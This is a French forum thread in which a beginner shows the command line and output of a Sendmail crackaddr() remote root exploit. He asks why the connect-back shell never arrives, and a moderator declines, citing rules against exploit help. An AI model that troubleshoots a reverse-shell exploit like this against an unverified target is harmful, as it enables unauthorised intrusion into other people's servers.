Bugs avec remote exploits

vreezver Messages postés 5 Statut Membre -  
mamiemando Messages postés 33869 Date d'inscription   Statut Modérateur Dernière intervention   -
Bonjour,

je suis debutant dans la securite informatique.
je m'interesse surtout aux exploits et a l'intrusion reseau.
je suis presentement en train de tester le bug (crackaddr()) en remote du sendmail 8.10.x.
voici mon probleme:

--------------------------------
vreezver@Linux:[$] ./exploit <target_ip> <mon_ip> <targer_number> # ici le target number est 0

Sendmail <8.12.8 crackaddr() exploit by bysin
from the l33tsecurity crew

Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt... # Ensuite plus rien... J'ai beau faire un netcat, en vain.

vreezver@Linux:[$]
-------------------------------------------------------
je pense que le probleme vient du fait que je travaille a partir d'un reseau local et que je recois la connexion internet d'un serveur.

-peut etre que le "root prompt" est bloqué par un firewall (le notre peut etre ou celui du target)

-peut etre que c'est le fait que le "mon_ip" n'est pas le bon, car je ne sais pas si je devrais utiliser le IP externe de ma machine ou celui du LAN.

La question centrale est : "Est ce que je recois vraiment le shell? si oui pourquoi je n'arrive pas a l'utiliser?"

Merci de votre interet a me repondre et si possible envoyez moi la reponse par mail
vreezver@yahoo.fr

1 réponse

mamiemando Messages postés 33869 Date d'inscription   Statut Modérateur Dernière intervention   7 902
 
Le problème c'est qu'on a aucun moyen de savoir si tes intentions d'utiliser cet exploit sont nobles ou pas. Or tout ce qui est en rapport avec cracker un logiciel, hacker une machine, ou utiliser un exploit seront classés hors charte et supprimés par les modérateurs.

Encore désolée
0